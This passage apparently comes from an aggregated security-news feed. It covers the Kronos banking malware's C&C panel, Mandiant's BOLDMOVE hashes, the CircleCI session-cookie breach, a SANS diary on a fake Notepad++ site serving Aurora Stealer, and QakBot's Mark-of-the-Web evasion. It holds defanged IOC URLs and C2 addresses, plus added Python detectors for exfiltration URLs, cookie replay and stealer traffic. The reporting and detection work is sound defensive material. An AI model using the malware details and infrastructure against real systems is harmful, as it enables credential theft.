Device information (e.g., operating system and web browser type).
The name of the targeted bank that the attacker has configured.
Quick data showing the victim’s login credentials.
The “redirect” feature, which redirects all existing and new bots to present links on each page.
The “block” feature, which blocks access to the page after the user enters their credentials.
Comments from the C&C owner.

The C&C admin page provides a robust view of victim activity and is an efficient way for attackers to collect victim data and user statistics that show the progress of their campaign. The C&C main features include:

Statistics on the number of infected bots and other metrics.
A list of infected bots, including their IP addresses and other details.
The ability to remotely control infected bots.
The ability to export logs of stolen information.
Settings for the stealer component of the malware.
A blacklist of web pages that the malware should not target.

Targeted Financial Institution: Mexico Region

During an observed attack on a Mexico region financial institution, we identified multiple indicators of compromise.

IOC: 

In this instance, we were able to retrieve indicators of compromise (IOCs) from the JavaScript configuration file located at “8vZ9d1-ad.js”.

hxxps://dlxfreight.bid/mx/
hxxps://dlxfreight.bid/w1Q5DXr7te/gate.php
hxxps://pnlbanorte.dlxfreight.bid
hxxps://dlxfreight.bid/
hxxp://tomolina[.]top/
hxxps://facturacionmexico.net/choa.php
hxxps://dlxfreightmore.com
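The “send_home” exfiltration format described above (gate.php with a pl= token and a link= label naming the targeted bank) and the IOC list just given are both things a proxy log can be checked against. The following is an added example, not IBM Trusteer's code: a small Python detector that refangs the IOCs, then scans constructed proxy log lines for three signals: requests to an IOC host, the gate.php?pl=…&link=… exfiltration pattern (from which it pulls the bank label), and a request for one of the two injected script names. The log format (timestamp, source IP, method, URL, status) and the log lines themselves are constructed for the example.

```python
from urllib.parse import urlsplit, parse_qs

# IOCs as listed above, defanged as published.
IOC_URLS = [
    "hxxps://dlxfreight.bid/mx/",
    "hxxps://dlxfreight.bid/w1Q5DXr7te/gate.php",
    "hxxps://pnlbanorte.dlxfreight.bid",
    "hxxps://dlxfreight.bid/",
    "hxxp://tomolina[.]top/",
    "hxxps://facturacionmexico.net/choa.php",
    "hxxps://dlxfreightmore.com",
]
INJECT_SCRIPTS = {"8vZ9d1-ad.js", "ok.js"}


def refang(ioc: str) -> str:
    return ioc.replace("hxxp", "http").replace("[.]", ".")


def ioc_hosts(iocs):
    """Lower-cased host names from the defanged IOC URLs."""
    return {urlsplit(refang(u)).hostname.lower() for u in iocs}


def classify_url(url: str, hosts):
    """Return a list of (kind, detail) findings for one request URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    query = parse_qs(parts.query)
    findings = []
    if host in hosts or any(host.endswith("." + h) for h in hosts):
        findings.append(("ioc_domain", host))
    # send_home: .../gate.php?pl=<token>&link=<bank label>
    if parts.path.endswith("/gate.php") and "pl" in query and "link" in query:
        findings.append(("send_home_exfil", query["link"][0]))
    script = parts.path.rsplit("/", 1)[-1]
    if script in INJECT_SCRIPTS:
        findings.append(("inject_script", script))
    return findings


# Constructed proxy log (not real traffic): "<ts> <src ip> <method> <url> <status>"
SAMPLE_PROXY_LOG = """\
2022-11-14T10:01:02Z 10.0.0.15 GET https://www.example-bank.mx/login 200
2022-11-14T10:01:05Z 10.0.0.15 GET https://dlxfreight.bid/mx/8vZ9d1-ad.js 200
2022-11-14T10:02:40Z 10.0.0.15 GET https://tomolina.top/uadmin/gate.php?pl=token&link=hsbc_mx1.1 200
2022-11-14T10:03:00Z 10.0.0.22 GET https://cdn.example.com/ok.js 200
2022-11-14T10:03:10Z 10.0.0.15 POST https://pnlbanorte.dlxfreight.bid/w1Q5DXr7te/gate.php 200
"""


def scan_log(text: str, iocs=IOC_URLS):
    """One alert dict per finding, keyed by source host so the infected client
    can be identified and its bank sessions treated as compromised."""
    hosts = ioc_hosts(iocs)
    alerts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, src, _method, url = fields[:4]
        for kind, detail in classify_url(url, hosts):
            alerts.append({"ts": ts, "src": src, "kind": kind, "detail": detail})
    return alerts
```

An `inject_script` hit on its own is weak evidence (“ok.js” is a common file name), so treat it as confirmation only alongside an `ioc_domain` or `send_home_exfil` hit from the same source; the `link` label tells you which institution's session the attacker now holds credentials for.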

How to Stay Safe from Kronos

To protect against Kronos, it is important to use reputable antivirus and anti-malware programs, as well as to keep systems updated with the latest security patches and software updates. Additionally, employees should be educated on how to recognize and avoid phishing emails, and organizations should implement email filtering and other security measures to block malicious emails.

If a system is suspected to be infected with Kronos, it is important to take the system offline immediately and perform a thorough scan using antivirus and anti-malware tools. Any sensitive data that may have been compromised should also be changed immediately.

It is suspected that this malware campaign may potentially spread to the North American region and potentially also to the European region. Due to its advanced functionality and ability to evade detection, it is important for individuals and organizations in these regions to be aware of the threat it poses and take the actions noted above to better protect against it.

To learn how to authenticate customers, detect fraud and protect against malicious users across all channels, explore IBM Security Trusteer solutions.

The post Kronos Malware Reemerges with Increased Functionality appeared first on Security Intelligence.

The results of our latest survey on mobile cybersecurity in K-12 and hospitals are in—and it’s not all peaches and roses.

When we talk about endpoint protection, it’s only natural to only think about the most commonly compromised endpoints like work laptops and servers—but your smartphone isn’t off the hook.

There are plenty of risks associated with mobile devices, and we ignore them at our peril. In 2020 alone, almost 50% of organizations had at least one employee download a malicious mobile application that threatened their organization’s network and data.

Certain industries such as education and healthcare face their own distinct set of challenges when it comes to mobile security, namely a diverse amount of endpoints and lackluster budgets and infrastructure.

To better understand the mobile security landscape, we asked 250 schools and hospitals about their mobile security posture (including Chromebooks). The average organization surveyed was based in North America and had anywhere from 250 to over 5000 endpoints.

Here are some key takeaways.

45% of schools reported that at least one cybersecurity incident last year started with Chromebooks or other mobile devices

Almost 30% of schools and hospitals aren’t protecting mobile devices with their current endpoint protection solution

77% of organizations are confident in their ability to protect mobile devices, including Chromebooks, from cybersecurity threats

Chromebooks and employee devices rank top among schools’ riskiest attack surfaces

63% of organizations say cost is their biggest concern for their current mobile security tools

58% of organizations’ cybersecurity budgets are the same compared to 2022

Mobile security for resource-constrained organizations

Don’t let mobile and Chromebook threats catch you off guard in 2023.

Malwarebytes 2023 State of Mobile Cybersecurity showed that while most organizations may be confident in their mobile security posture, almost a third aren’t currently protecting their mobile endpoints and close to half have experienced a cybersecurity incident due to a mobile device or Chromebook in 2022.

Needless to say, today’s organizations and public sector institutions need to protect a growing number of mobile endpoints, including Chromebooks.

Enter Malwarebytes Mobile Security for Business, which extends our award-winning endpoint protection to mobile devices. Tailor-made for organizations with resource constraints, IT teams can conveniently manage protection across Chrome OS, Android and iOS devices from the same cloud-native console monitoring their servers, workstations, and laptops.

Learn more about mobile security and why it’s important and check out our blog posts “Improving security for mobile devices: CISA issues guides” and “Do Chromebooks need antivirus protection?” for more tips on improving your organizations mobile and Chromebook security posture.

Stay vigilant! 


Context

On January 19, 2023, Mandiant security researchers published the technical details of malware campaign preparations they’ve reportedly observed since October 2022.

Two key points should be noted regarding Mandiant’s assessment:

Mandiant has not directly observed exploitation of the vulnerability, or deployment of BOLDMOVE in the wild.

Mandiant researchers assess with low confidence that the campaign is related to an unspecified Chinese cyber espionage group, based on: timing of development, characters in host survey buffers, and the common tactic of exploiting zero-days in network devices.

Technical Details

According to the National Vulnerability Database from NIST, CVE-2022-42475 has a severity score of 9.8 CRITICAL and is “A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.”

According to Mandiant researchers, the campaign delivered a new backdoor malware they named “BOLDMOVE.” Mandiant identified both Linux and Windows variants of BOLDMOVE but has not observed the malware in the wild.

IOCs

Mandiant researchers provided the following indicators of compromise (IOCs):

Indicator                                                          Type     Notes
12e28c14bb7f7b9513a02e5857592ad7                                   MD5      Basic BOLDMOVE
3da407c1a30d810aaff9a04dfc1ef5861062ebdf0e6d0f6823ca682ca08c37da   SHA256   Basic BOLDMOVE
3191cb2e06e9a30792309813793f78b6                                   MD5      Extended BOLDMOVE
0184e3d3dd8f4778d192d07e2caf44211141a570d45bb47a87894c68ebebeabb   SHA256   Extended BOLDMOVE
54bbea35b095ddfe9740df97b693627b                                   MD5      Windows version of BOLDMOVE
61aae0e18c41ec4f610676680d26f6c6e1d4d5aa4e5092e40915fe806b679cd4   SHA256   Windows version of BOLDMOVE

Our most recent Cloud and Threat Report highlighted how threat actors abuse cloud services (with a special focus on cloud storage apps) to deliver malicious content (and yes, OneDrive leads the chart of the most exploited apps).

To confirm that this trend will likely continue in 2023, researchers at Trend Micro have discovered an active campaign, launched by a threat actor named Earth Bogle. They are using Middle Eastern geopolitical themes as a lure to target potential victims in the Middle East and Africa, and exploiting multiple public cloud storage services in a two-staged campaign aimed to distribute the remote access tool NjRAT (AKA Bladabindi).

During 2022 we discovered 401 different apps exploited to deliver malware, and this fragmentation trend will also likely continue in 2023, given that for this specific campaign the threat actors weaponized multiple cloud services. These include not only the usual suspects, OneDrive and Discord, together with compromised legitimate websites, used to distribute the stage-two dropper, but also a couple of less-known cloud storage services, files.fm and failiem.lv, used to deliver the stage-one payload hidden inside a Microsoft Cabinet (CAB) archive masquerading as a “sensitive” audio file (once again the attackers prey on the curiosity of their victims).

An additional interesting aspect of this campaign is that the links to the malicious cloud storage apps have been advertised through fake social media accounts claiming to belong to reputable organizations. This is an additional indirect contribution of weaponized cloud services for this campaign, as we have also demonstrated in our Cloud and Threat report, where social media were among the top referrers for distributing malicious links.

As the Trend Micro researchers point out, this case demonstrates that threat actors will leverage public cloud storage as malware file servers, combined with social engineering techniques appealing to people’s sentiments, such as regional geopolitical themes as lures, to infect targeted populations.

How Netskope mitigates the risk of legitimate cloud services exploited to deliver malware

For all the cloud services involved in this campaign, the Netskope Next Gen SWG provides granular access control. It is possible to govern up to 35 activities for the “Cloud Storage” category, to which OneDrive, files.fm, and failiem.lv belong, and up to seven activities for the “Chat, IM, & other communication” category, to which Discord belongs. Moreover, OneDrive is one of the dozens of apps for which instance detection is also available. To defend against attacks where a legitimate cloud service is exploited to distribute malware, it is possible to configure a policy that prevents potentially dangerous activities (such as download) from non-corporate instances, or in general from any cloud storage or instant messaging service the enterprise does not need.

Netskope customers are also protected against malware distributed from a legitimate cloud service by Netskope Threat Protection. Netskope Threat Protection scans web and cloud traffic to detect known and unknown threats with a comprehensive set of engines including signature-based AV, machine learning-based detectors for executables and Office documents, and sandboxing. Part of the advanced capabilities of Netskope Threat Protection is also the Patient Zero protection, which prevents the delivery of unknown or zero-day threats (at the time of discovery the malicious payloads of this campaign had a very low detection rate) until a verdict by the advanced engines is available. And obviously Netskope threat intelligence blocks the access to malicious sites, wherever they are hosted, whether it is a malicious domain or a weaponized cloud app, and regardless of the origin of the link, such as a social media account.

Netskope Cloud Exchange, included in any license, is a precious ally of Netskope customers, providing a powerful tool to leverage existing security investments through the integration between the Netskope platform and third-party technologies such as threat intelligence feeds, endpoint detection solutions, trouble ticketing systems, and SIEM/SOAR platforms.

Finally, Netskope Advanced Analytics provides specific dashboards to assess the risk of rogue cloud instances being exploited to deliver malware or becoming the target of anomalous communications, with rich details and insights, supporting security teams in the analysis and mitigation/remediation process.

You can subscribe to the Cloud Threats Memo mailing list at this link.

The post Cloud Threats Memo: Threat Actors Continue to Abuse Cloud Services to Deliver Malware in 2023 appeared first on Netskope.


The Cofense Phishing Defense Center (PDC) employs expert Threat Analysts to analyze emails on behalf of enterprise customers across the globe, in various industries, who are dealing daily with phishing attacks delivering malware. To help keep up with evolving tactics and top ongoing threats affecting real customers, the PDC has created a breakdown of the […]

The post Top Malware Trends of December: Cofense Phishing Defense Center (PDC) appeared first on Cofense.


Software development service company CircleCI has published its incident report on a breach that happened in December.

CircleCI revealed that an engineer’s laptop was infected with a yet-to-be-named information-stealing Trojan, which was used to steal the engineer’s session cookie. The company did not say how the malware got onto the laptop.

From the report:

“This machine was compromised on December 16, 2022. The malware was not detected by our antivirus software. Our investigation indicates that the malware was able to execute session cookie theft, enabling them to impersonate the targeted employee in a remote location and then escalate access to a subset of our production systems.”

In this case, the session cookie was an authentication token, described in the report as a “2FA-backed SSO session” cookie. This is a kind of authentication cookie that is stored by a web browser after you successfully log in to a website. When the browser interacts with restricted content, it uses the cookie to prove that you have logged in, so you don’t need to reenter your password over and over again.

Stealing a user’s authentication cookie gives an attacker exactly the same access as they’d get if they stole the user’s password and logged in. In this case, the account wasn’t just protected by a password, it was also protected by some form of two-factor authentication (2FA). By stealing an authentication cookie, the attacker was able to perform an end run around the 2FA (and any other forms of authentication) protecting the account: the second factor is checked at login, and the cookie is the proof that login already happened.

Thankfully, stealing authentication cookies isn’t easy, and in this case the attacker was only able to do it by installing malware on an engineer’s laptop, from where they could probably have stolen the victim’s passwords and 2FA tokens eventually anyway.
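Because the stolen cookie is replayed from the attacker's machine rather than the engineer's, the replay is visible in the identity provider's audit log: the same session id appears from a client it was never issued to. The following is an added example, not CircleCI's code or report material: a Python check over constructed SSO audit events that binds each session to the client (IP and User-Agent) that first used it and flags later use from a different client, plus use of a session past a maximum age at which re-authentication (and a fresh second-factor check) should have been forced. The event fields, the sample events and the `max_age` default are assumptions.

```python
from datetime import datetime, timedelta

# Constructed SSO audit events (not CircleCI data): one row per request that
# presented a session cookie. Fields assumed: ISO-8601 timestamp, session id,
# user, client IP and User-Agent.
SAMPLE_EVENTS = [
    {"ts": "2022-12-16T08:55:00Z", "session": "S1", "user": "eng1",
     "ip": "198.51.100.10", "ua": "Chrome/108 macOS"},
    {"ts": "2022-12-16T09:10:00Z", "session": "S2", "user": "eng2",
     "ip": "198.51.100.11", "ua": "Firefox/107 Linux"},
    {"ts": "2022-12-16T11:20:00Z", "session": "S1", "user": "eng1",
     "ip": "198.51.100.10", "ua": "Chrome/108 macOS"},
    {"ts": "2022-12-17T09:30:00Z", "session": "S2", "user": "eng2",
     "ip": "198.51.100.11", "ua": "Firefox/107 Linux"},
    # eng1's cookie, replayed days later from a client it was never issued to
    {"ts": "2022-12-19T14:02:00Z", "session": "S1", "user": "eng1",
     "ip": "203.0.113.77", "ua": "Chrome/108 Windows"},
]


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def find_session_anomalies(events, max_age=timedelta(hours=8)):
    """Bind each session id to the client that first used it and flag
    (a) later use from a different IP or User-Agent: a replayed cookie, and
    (b) use beyond max_age: the session should have forced re-authentication
    (with the second factor re-checked) by then."""
    first_seen = {}
    alerts = []
    for e in sorted(events, key=lambda e: parse_ts(e["ts"])):
        ts, sid = parse_ts(e["ts"]), e["session"]
        if sid not in first_seen:
            first_seen[sid] = (ts, e["ip"], e["ua"])
            continue
        t0, ip0, ua0 = first_seen[sid]
        if (e["ip"], e["ua"]) != (ip0, ua0):
            alerts.append({"session": sid, "user": e["user"], "ts": e["ts"],
                           "reason": "new_client", "from": (ip0, ua0),
                           "to": (e["ip"], e["ua"])})
        elif ts - t0 > max_age:
            alerts.append({"session": sid, "user": e["user"], "ts": e["ts"],
                           "reason": "stale_session", "age": ts - t0})
    return alerts
```

A `new_client` alert on a session that can mint production credentials is the point at which to revoke the session and start rotating every token that session could have reached; binding the cookie to the client at issuance (or a short `max_age`) turns the same logic from a detection into a control.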

A customer alerted the company to “suspicious GitHub OAuth activity” on December 29, 2022, leading to the conclusion that this customer’s OAuth token had been compromised. As a result, CircleCI says it proactively began rotating all customer-associated tokens on their behalf. These include Project API, Personal API, and GitHub OAuth tokens.

CircleCI made an official announcement of its security breach on January 4 of this year, urging all its clients to rotate “any and all” their secrets—passwords or private keys—stored in CircleCI and review logs for unauthorized access occurring between December 21, 2022, and January 4, 2023.

Because the victim employee is an engineer who routinely generates access tokens, the attacker “access[ed] and exfiltrate[d] data from a subset of databases and stores, including customer environment variables, tokens, and keys.” The company also has reason to believe that reconnaissance activity took place first, on December 19, before exfiltration was spotted on December 22, just days later.

“Though all the data exfiltrated was encrypted at rest, the third party extracted encryption keys from a running process, enabling them to potentially access the encrypted data,” the report further says.

Since then, CircleCI says it has been improving its infrastructure by adding behavior detection to its antivirus and mobile device management (MDM) system. It’s also restricted access to its production environments and increased the security of its 2FA implementation.

This recent cybersecurity incident with CircleCI isn’t a first. In 2019, the company was breached following a supply chain attack against its analytics vendor. Its account with the vendor was compromised, giving attackers access to some user data, which includes usernames and email addresses associated with GitHub and Bitbucket.


Introduction

Google ads are a common vector for malware distribution.  Do a Google search for any popular free software download.  Review any search results marked “Ad” or “Sponsored,” then check the link to see if anything is unusual.

I’ve already written two diaries and authored various tweets about this type of activity:

https://isc.sans.edu/diary/Google+ad+traffic+leads+to+stealer+packages+based+on+free+software/29376
https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344

2023-01-16 (Monday) – Google ad led to fake software site sending malware. Post-infection activity for #Gozi (#ISFB/#Ursnif) and #RedlineStealer. Seeing this for different software searches. Indicators for an infection from a fake 7-Zip page available at https://t.co/B8pGG8t3hB pic.twitter.com/kxHzsA0DxR

— Unit 42 (@Unit42_Intel) January 17, 2023

2022-12-29 (Thursday): Google ad leads to fake Adobe Reader page pushing malware. IOCs available at: https://t.co/eQTkfQUeVn pic.twitter.com/cqZMz1uulM

— Unit 42 (@Unit42_Intel) December 29, 2022

Others have also reported this activity.  Recent posts include:

https://www.bleepingcomputer.com/news/security/google-ad-for-gimporg-served-info-stealing-malware-via-lookalike-site/
https://heimdalsecurity.com/blog/google-ads-exploited-to-spread-malware/
https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e

Google Ads Malware Wipes NFT Influencer’s Crypto Wallet

One example of free software routinely spoofed for Google ads is Notepad++.  Almost without fail, I can find a fake webpage for Notepad++ every day through Google ads.  For today’s diary, I found a Google ad for a malicious site at notopod-plos-plus[.]com.


Shown above:  Google ad for fake Notepad++ site.  Misspelled “Notepad” as “Notepade” in the ad.

These fake sites copy pages from the real software sites and have links to download the malware.


Shown above:  Downloading malware from the fake Notepad++ page.

The URL to download malware was notopod-plos-plus[.]com/bsdf/file.php which redirected to another URL hosting the malware.  I found the redirect by using a URL shortener revealer.  In this case, I used expandurl.net and found the malware hosted at hxxps://obsqroject[.]com/npp.8.4.8.Installer.x64.exe.  Note the “q” in “obsqroject” in the malware download URL.  The malware is hosted on a server impersonating the legitimate site obsproject.com.


Shown above:  Using a tool that reveals locations of shortened URLs to find a redirect for our malware.

The downloaded malware was detected by Microsoft Defender as an unrecognized app, so I had some extra clicks to run it.


Shown above:  Windows Defender doesn’t like this type of downloaded EXE file.

Post-infection traffic caused by this malware went to a server at 79.137.133[.]225 over TCP port 8081.


Shown above:  Post-infection traffic shown in Wireshark.

Post-infection traffic consists of plain text.  Text sent by the server to the infected Windows host was WORK and Accept and Thanks. Data sent by the infected Windows host to the server looks like Base64 text.


Shown above:  Start of TCP stream for the post-infection traffic.


Shown above:  End of TCP stream for the post-infection traffic.

Note the server sent WORK once, Accept multiple times and Thanks twice.


Shown above:  Text sent from the server to the infected Windows host.

This post-infection traffic follows patterns seen with previous examples of Aurora Stealer malware.
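The plain-text pattern described above (server sends WORK, then Accept repeatedly, then Thanks; the infected host answers with Base64) is simple enough to score from a reassembled TCP stream. The following Python is an added example and not part of the diary or of any Aurora Stealer tooling: it walks a list of (direction, payload) segments, counts the server tokens, checks that every client segment is well-formed Base64, and flags the stream when the shape matches. The stream contents are constructed stand-ins, not the real captured data, and the scoring thresholds are an assumption for illustration.

```python
import base64
import re
from collections import Counter

# Server-side tokens described in the diary: WORK once, Accept repeatedly, Thanks.
SERVER_TOKENS = {b"WORK", b"Accept", b"Thanks"}

# Strict Base64 alphabet check; the client side of the stream looked like Base64 text.
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")

# Constructed reassembled TCP stream as (direction, payload) pairs.
# "srv" is the C2 server -> infected host, "cli" is infected host -> server.
# The Base64 payloads below are invented stand-ins, not the real exfiltrated data.
SAMPLE_STREAM = [
    ("srv", b"WORK"),
    ("cli", base64.b64encode(b'{"host":"WIN-ANALYSIS","user":"analyst"}')),
    ("srv", b"Accept"),
    ("cli", base64.b64encode(b"constructed-browser-data-placeholder")),
    ("srv", b"Accept"),
    ("cli", base64.b64encode(b"constructed-screenshot-placeholder")),
    ("srv", b"Thanks"),
    ("srv", b"Thanks"),
]


def looks_like_base64(payload: bytes) -> bool:
    """True if the payload is well-formed Base64 of a non-trivial length."""
    payload = payload.strip()
    if len(payload) < 8 or len(payload) % 4 != 0:
        return False
    if not B64_RE.match(payload):
        return False
    try:
        base64.b64decode(payload, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True


def score_stream(stream) -> dict:
    """Summarize server tokens and client Base64 segments; flag the Aurora-like shape."""
    server_counts = Counter()
    unknown_server = 0
    client_b64 = 0
    client_other = 0
    for direction, payload in stream:
        text = payload.strip()
        if direction == "srv":
            if text in SERVER_TOKENS:
                server_counts[text.decode()] += 1
            else:
                unknown_server += 1
        elif looks_like_base64(text):
            client_b64 += 1
        else:
            client_other += 1
    # Assumed matching rule: WORK and Accept seen, nothing else from the server,
    # and every client segment is Base64.
    match = (
        server_counts.get("WORK", 0) >= 1
        and server_counts.get("Accept", 0) >= 1
        and unknown_server == 0
        and client_b64 >= 1
        and client_other == 0
    )
    return {
        "server_tokens": dict(server_counts),
        "unknown_server_segments": unknown_server,
        "client_base64_segments": client_b64,
        "client_other_segments": client_other,
        "match": match,
    }


if __name__ == "__main__":
    print(score_stream(SAMPLE_STREAM))
```

In practice the segments would come from a `Follow TCP Stream` export or a tshark dump of the port 8081 session; the scorer deliberately rejects streams where the server says anything other than the three tokens, which keeps ordinary HTTP or TLS sessions on the same port from matching.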

Indicators of Compromise

Google ad traffic to fake Notepad++ site:

hxxps://www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwiNnNGbq9D8AhUOFdQBHYudC80YABAAGgJvYQ&ohost=www.google.com&cid=CAASJORocbWbOK8xihLbtr-uk4JIaGPISKgFmjK_urkXpVpd9puZOQ&sig=AOD64_3UiS622EDVVxZE1kULfyg7CYIZgA&q&adurl&ved=2ahUKEwik1sqbq9D8AhXJmGoFHamhBjM4MhDRDHoECAEQAQ
hxxps://notopod-plos-plus[.]com/?gclid=EAIaIQobChMIjZzRm6vQ_AIVDhXUAR2LnQvNEAMYASAAEgKemfD_BwE

Traffic to download the malware:

hxxps://notopod-plos-plus[.]com/bsdf/file.php
hxxps://obsqroject[.]com/npp.8.4.8.Installer.x64.exe

Aurora Stealer post-infection traffic:

tcp://79.137.133[.]225:8081

Downloaded Aurora Stealer malware sample available at:

https://bazaar.abuse.ch/sample/6c365c86aa823b55235be2d7f139160bfe994a33b2d34b73de239b24bbde7391

Sandbox analysis of the Aurora Stealer malware:

https://app.any.run/tasks/3998cf08-2e26-45da-8d37-f1e99aba0d3f
https://tria.ge/230118-f1ewcaac94

Final Words

Criminal groups frequently use Google ads to distribute malware.  These ads frequently lead to fake sites impersonating web pages for legitimate software.  In some cases, these malicious files install a copy of the legitimate software and include malware in the background.  In other cases like this one, the files just run or install malware.

In most cases, Microsoft Defender warns victims these files are potentially dangerous.  Unfortunately, many people click past these warnings and infect their computers.

How can we best prevent these infections?  My advice is to follow best security practices and avoid ads when searching for free software downloads on Google.

—-
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


We discuss the Batloader malware campaigns we observed in the last quarter of 2022, including our analysis of Water Minyades-related events (This is the intrusion set we track behind the creation of Batloader).


Proof of Concept (POC): We investigate one of the GitHub Codespaces’ real-time code development and collaboration features that attackers can abuse for cloud-based trusted malware delivery. Once exploited, malicious actors can abuse legitimate GitHub accounts to create a malware file server.


Today’s AI can beat humans at Jeopardy, chess, recognizing faces and diagnosing medical conditions. As of last Fall it can write malware, too. In fact, it can write an entire attack chain: phishing emails, macros, reverse shells, you name it. What do we do now?

The post AI Can Write Malware Now. Are We Doomed? appeared first on Check Point Research.

Malicious links. Third-party ad trackers. Information-gobbling data brokers.

Let’s face it, the Internet is kind of like the Wild West when it comes to threats to our privacy and security. And unfortunately, it takes a little more than a cowboy hat and a pistol to defend yourself out there.

That’s where Malwarebytes Premium + Privacy VPN comes in.

Whether it’s blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier.

1. Lets you browse anonymously

It’s no secret that some companies are big fans of your personal information.

Your name, your address, location data, and more, are all being collected, packaged up, and sold to advertisers at any given moment. Even menstrual cycle data is fair game.

But one of the most valuable pieces of information is your browsing history, because it says a lot about what you like and where you spend your time. When it comes to getting a good look at your browsing your ISP has a window seat, and in the USA ISPs have been allowed to sell your browsing data since 2017.

The easiest and most effective ways to put a stop to that? Using a Virtual Private Network, or VPN.

VPNs create a secure, encrypted “tunnel” between your device and the VPN server, through which all of your internet traffic is routed—so if your ISP is collecting your data, it won’t be able to read it.

But not all VPNs are equal.

Some VPN providers log your data and browsing history, which means they’re just another ISP that can potentially share your data with third parties. Other VPNs can slow down your Internet to a significant degree, using older encryption methods or having fewer options for servers located nearer to you.

Needless to say, choosing the wrong VPN vendor can feel like trading one poison for another. So if you’re tired of dealing with both data-hungry companies and lackluster VPNs, then look no further than Malwarebytes Privacy.

We don’t log anything. Ever.
Best-in-class encryption secures your personal information.
Less lag. Browse the Internet faster with VPNs powered by WireGuard®.
Over 380 servers in more than 30 countries.
7-day free trial. All the premium features, no data limits!

2. Crushes ads, third-party trackers, and blocks malicious websites

We ignore the many threats to web browsers at our own peril.

Legitimate sites are following us with third-party tracking code, and criminal hackers are busy making friendly sites unfriendly by injecting credit card skimmers, and trying to steal our passwords with phishing sites. One way or another, wherever you go, your personal, sensitive data is being stolen or shared with somebody using it for financial gain.

And your browser? It lets this happen without complaint.

If you think your browser comes with native abilities to block tracking scripts and other threats like phishing websites, though, you’d be half right.

Chrome has the infamously useless ‘Do Not Track’ setting, and anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen, but they work with variable levels of success and aren’t enough by themselves.

It stands to reason then that Malwarebytes Browser Guard is the ultimate browsing sidekick for quashing ads, phishing sites, and trackers.

You’re in charge. We prevent third-party ad trackers from collecting information about your browsing habits.
Shields up. We intercept (and block) malicious skimming scripts before your browser can execute them.
Clear the clutter. Browse up to 4x faster by blocking ads and other unwanted content.
Uses heuristics to sniff out and block unknown phishing sites.
Available on your preferred browser—for free!

Malwarebytes Browser Guard blocking a credit card skimming attack

3. Uses multiple protection layers to actively stop threats

A key part of browsing securely online is accepting the risk that no one technology can keep out 100 percent of the threats 100 percent of the time.

To that end, it’s essential to use a strong anti-malware product that catches any threats that do slip through the cracks and make it to your desktop.

But that’s not all. To quote everybody’s favorite ogre, security has “layers” just like onions—your anti-malware should also have multi-layers of defense, not just one.

Because what’s better than one layer of protection? Two.

What’s better than two? Three.

Better than that?

(Okay, you get the point.)

The fact is you don’t want to rely on any one mechanism to keep the wolves at bay, you want several.

Enter Malwarebytes Premium, offering four different layers of malware protection.

Advanced web protection. Blocks outgoing or incoming communication so malware can’t receive instructions or steal your data.
Malware & PUP protection. Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats.
Ransomware protection. Proprietary ransomware attack prevention technology.
Exploit protection. Blocks malware which seeks to leverage bugs and vulnerabilities in your device.

Go beyond just antivirus. Level-up your security and privacy today.

Choosing between security and privacy shouldn’t feel like a Herculean task.

While no single method is ever 100 percent foolproof, there are some tried and true ways for keeping your data (and device) safe that, if put into practice, will guard you from most of the threats and prying eyes on the Internet.

Downloading Malwarebytes is one of those ways.

With the Malwarebytes Premium + Privacy VPN bundle, you get total protection with smart antivirus, faster, safer web browsing, and our next-gen VPN for your online privacy. Level-up your protection and upgrade to the bundle today.

Stay safe out there!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.


Check Point Research reports that Glupteba has returned to the top ten list for the first time since July 2022. Qbot overtook Emotet as the most prevalent malware in December, while the Android malware Hiddad made a comeback. Our latest Global Threat Index for December 2022 saw Glupteba Malware, an ambitious blockchain-enabled Trojan botnet, return to…

The post December 2022’s Most Wanted Malware: Glupteba Entering Top Ten and Qbot in First Place appeared first on Check Point Software.


Executive Summary

This paper investigates a recent QakBot phishing campaign’s ability to evade the Mark-of-the-Web (MoTW) security feature, allowing it to escape the designated security zone and successfully install malicious software on the victim device. Key observations:

EclecticIQ analysts investigated QakBot phishing campaigns switching to a Zero-Day Vulnerability to evade Windows Mark of the Web (MoTW). QakBot may be able to increase its infection success rate as a result of the switch to a zero-day exploit.

The threat actor distributes QakBot using phishing emails with a malicious URL inside.

When a victim user clicks on the malicious URL, it starts to download an encrypted ZIP folder that contains an ISO image. If the ISO image is opened by victim, it will mount itself on a disk and open another File Explorer window that contains the final QakBot Loader as a JavaScript format which can be executed by a simple user click.

The final QakBot loader (WW.js) contains a malformed digital signature to evade the Mark of the Web (MoTW) security feature on Windows.

EclecticIQ analysts observed that the use of zero-day vulnerabilities is increasing among non-nation-state cyber criminals.

Living off the Land Binaries (LOLBINS) like Regsvr32.exe (2) and WScript.exe (3) are actively abused to execute QakBot Malware.

What is Mark of The Web (MoTW)?

Mark of the Web (MoTW) is used by Windows as a security feature across its product suite. This feature works by checking executable files downloaded by Windows users against a file whitelist. If the file is not on that list, Windows Defender SmartScreen will show a warning message like the image below and will not execute the malware:


Figure 1 – Windows SmartScreen warning

The MS Office Protected View feature is used to protect MS Office users against potential malware in documents. Most MS Office file types flagged with MoTW will be opened in Protected View:


Figure 2 – MS Office document opened in Protected View

MS Office is able to block macro-enabled Office documents downloaded from the internet if the appropriate setting is enabled. Macros in MS Office files flagged with MoTW are disabled and a warning message is displayed to the user:


